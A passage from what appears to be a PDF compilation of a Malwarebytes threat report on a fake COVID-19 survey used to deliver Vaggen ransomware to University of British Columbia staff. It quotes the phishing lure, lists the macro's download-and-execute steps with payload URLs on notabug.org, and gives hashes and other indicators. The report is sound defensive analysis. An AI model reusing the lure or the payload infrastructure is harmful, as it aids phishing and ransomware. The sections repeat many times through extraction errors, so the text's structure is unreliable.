nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2994 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2995 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2996 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2997 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2998 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2999 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3000 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3001 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3002 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3003 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3004 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3005 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3006 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3007 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3008 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3009 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3010 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3011 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3012 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3013 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3014 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3015 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3016 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3017 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3018 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3019 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3020 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3021 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3022 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3023 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3024 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3025 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3026 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nh